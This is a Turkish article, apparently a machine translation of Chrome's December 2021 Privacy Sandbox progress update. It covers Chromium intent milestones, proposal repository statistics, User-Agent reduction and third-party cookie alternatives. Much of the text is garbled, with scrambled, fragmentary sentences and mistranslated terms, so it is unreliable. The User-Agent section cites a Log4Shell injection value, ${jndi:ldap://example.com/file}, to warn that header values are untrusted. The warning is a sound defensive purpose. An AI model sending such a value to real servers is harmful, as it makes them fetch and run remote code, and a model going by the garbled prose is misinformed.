Özel Korumalı Alan'da İlerleme (Aralık 2021)

İlerleme Durumu'nun 2021 özet sayısına hoş geldiniz geliştirme aşamasında üçüncü taraf çerezlerini aşamalı olarak kullanımdan kaldırma sürecini Gizli web. Normalde, Özel Korumalı Alan'da yapılan güncellemelere genel bir bakış zaman çizelgesi ve ama Aralık ayı sessiz bir aydı. Bunun yerine ve uygulayabileceğiniz bazı olası çözümler sunmak. şimdi yeni yıldayız.

Chromium geliştirme süreci

Yeni bir web platformu özelliğinin Chromium'da görünmesi için projenin açık geliştirmesi işlemi hakkında daha fazla bilgi edinin. 2021'de Özel Korumalı Alan ekibi şunları yaptı:

🥚Prototip oluşturma amacı 19
🧪Deneme Amacı7
🚀Gönderim Amacı 11
Kaynak

Her ara hedef aynı zamanda daha geniş web ekosistemini de katkıda bulunmaya davet ediyor.

Prototip oluşturma amacı, bu tartışmaları davet ettiğimiz ilk kontrol noktasıdır. ve erken denemeler yapın. Bu, bir teklifin GitHub'da mevcut olacağı anlamına geliyor. Bir Sorun oluşturarak soru sorabilir veya tartışmalara katılabilir standartlardaki sunumlar diğer grupların IETF. Kodlama da bu noktada başlar. Bu nedenle, test etmek üzere geliştiricilerin kullanımına sunulabilecek prototip özellik flag'i seçin. İlk geri bildirim, tekliflerin doğrulanması ve yinelemesi açısından kritik öneme sahiptir.

Bir deneme isteğinde bulunmak için isteğe bağlı bir adım olan Deneme Amacı, kaynak denemesi Geliştiriciler kaynak için kaydolabilirler. deneme yapabilir ve ardından üretim aşamasında test edebilirsiniz. Bu özelliğe deneme deniyor çünkü kullandığımız özelliğin belirli yönlerine gerçek dünya ortamında doğrulama yapmak istiyor. Test ve bu testlerin sonuçlarını paylaşarak geliştirmeleri gözden geçirmeye geliştirmenizi sağlar.

Gönderim Niyeti, bir özelliğin artık kullanıma sunulduğunu bildiren son ara hedeftir. tamamlanmış ve genel kullanıma hazır durumda. Özellik onaylandıktan sonra geliştirilerek kullanıma sunulması ve Canary, Beta, ve Kararlı kanallar. Sitelerinizi söz konusu dilde test ettiğinizden emin olmak Canary ve Chrome'un Beta sürümlerini yakalayıp ve özellik, Mevcut ürün kanalına ulaşmadan önce hataları bildirmelidir.

Teklifler

Her Özel Korumalı Alan teklifine eşlik eden bir GitHub deposu bulunur. CEVAP kod deposu, genel işlevselliği özetleyen bir açıklayıcı, ayrıntılı bir ve tarayıcılar tarafından uygulanması ile ilgili spesifikasyonlar ve web ekosistemini sorunlar ve çekme istekleri şeklinde ifade eder.

14 Özel Korumalı Alan deposunda şunları elde ettik:

💬545Oluşturulan sorunlar
250Sorunlar kapatıldı
🛠️261Push İstekleri oluşturuldu
223Alma İstekleri birleştirildi
Kaynak

Açıklayıcılarda ve spesifikasyonlarda kullanılan dil genellikle bir kitleyi hedefliyor. standartlar ve tarayıcı geliştirme konusunda zaten bilgi sahibisiniz. zorlayıcı olabilir. Ancak bir açıklayıcının amacı açıklayın! Net olmayan veya kapsamayan noktalar varsa bunları değerlendirmenizi isteriz Konuyu güncelleyip netleştirebilmemiz için sorun bildirin.

Çözünürlükler

Kullanıcı aracısı bahar temizliği

Yeni Yıla aşağı saymaya devam ederken her ikisine de artı veriyoruz Chrome 100 ve artımlı azaltma dizesinin altını çizin. Bu iyi olup olmadığını kontrol etmek için kodunuzdaki kullanıcı aracısı dizesinin herhangi bir kullanımını tekrar gözden geçirme etkisini gösterir.

Bu alanları bulmak için:

  1. JavaScript kodunuzda navigator.userAgent ifadesini arayın veya Sunucu kodunuzda User-Agent üstbilgisi.
  2. Dizeyi ayrıştırırken 2 basamaklı bir versiyonla ilgili varsayımlar olup olmadığını kontrol edin. Örneğin, Örneğin, \d\d veya \d{2} belirten bir normal ifade \d+.
  3. Şunlara güvendiğiniz her yerde dize kullanımınızı kontrol edin:
    • platform (işletim sistemi) sürümü
    • tam Chrome derleme sürümü
    • mobil cihaz adı
  4. Bunlar, gelecekte sabit dizelere indirilecek değerlerdir. Eğer bu değerlere erişmeniz gerekiyorsa User-Agent Client'a İpuçları.

Kullanıcı Aracısı İstemcisi'ni kullanıyorsanız Aralık ayı için bir güncellemeden bahsetmek istiyorum. İpuçları, diğer kökenleri HTML <meta> etiketi ile gerçekleştiriliyor. Örneğin:

<meta name="accept-ch" content="sec-ch-ua-model=( https://foo.bar )">

Coşkulu bir bahar temizliği havasındaysanız şunları da deneyebilirsiniz: bir alternatifi ortaya çıkarır. Dizeyi mobil cihazları algıladıktan sonra bunu duyarlı arama ağıyla değiştirip değiştiremeyeceğinizi araştırın tasarım. Özellik desteği için tarayıcı adını ve sürümünü kontrol ediyorsanız .

Unutmayın, kullanıcı aracısının, sağladığınız herhangi bir müşteri gibi, değerinin doğru olacağı veya hatta sağlanacağı garanti edilmez. Son Log4j güvenlik açığı, "Log4shell" bu riskin bir örneğini sunar. Kullanıcı aracısı dizesini ${jndi:ldap://example.com/file} gibi bir değer ekleyerek sitenizi alabilirsiniz sunucu üzerinde etkin bir şekilde ayrıştırır.

Geleneksel bir diğer yeni yıl etkinliği de kaliteli malzemeler içeren sağlıklı kurabiyeler üretir. Taşımaya devam ederken üçüncü taraf çerezlerine yönelik desteğin sonlandırılmasına doğru ilerliyorsunuz. etkileneceğini belirleyebilirsiniz. 2020, yıl sonuna kadar siteler arası veya üçüncü tarafa ait tüm çerezleri işaretlemek için gerekli hale geldi. kullanımı SameSite=None ile.

SameSite özelliğini None olarak ayarladığınız tüm çerezler için güncelleyin.

Şu an için değerlendirebileceğiniz üç yol vardır:

  1. Çerez yalnızca üst düzey siteyle bire bir ilişkide gerekiyorsa ardından CHIPS'in ilerlemesini edinin. Bu, her bir Partitioned özelliğini çereze ekleyin.
  2. Çerez siteler arası bir bağlamda, ancak yalnızca sahip olduğunu ve işlettiği durumlarda, Birinci Taraf Gruplar. Bu, projenin ve çereze SameParty özelliğini ekleme.
  3. Çerez, birden çok öğede bir tür paylaşılan değer sağlamak için kullanılıyorsa daha geniş kapsamlı Özel Korumalı Alan bir alternatif çözüm için siteler arası izlemeden yararlanabilirsiniz.

Sağlığınıza dikkat ediyorsanız daha iyi bir tarifimiz var. Bu nedenle, kurabiye kullanımınızı iyileştirecek birinci taraf çerezlerini kullanabilir.

Geri bildirim

Bu aylık güncellemeleri yayınlamaya ve bir bütün olarak Özel Korumalı Alan'ı seçtik. Amacımız, geliştiricilerin ve desteği sunmaktır. @ChromiumDev adresinden bize bildirin kullanabileceğimiz bir konu varsa daha fazla bilgi vereceğiz. Verdiğiniz bilgileri, formatı geliştirmeye devam etmek için kullanacağız.

Daha ayrıntılı olarak ele aldığımız Özel Korumalı Alan hakkında SSS geliştirici destek ekibine gönderdiğiniz sorun göz önüne alınarak kapsamı genişletmeye devam edin. kod deposu'na gidin. Şu durumda: tekliflerden herhangi birinin test edilmesi veya uygulanması ile ilgili sorularınız varsa konuşalım.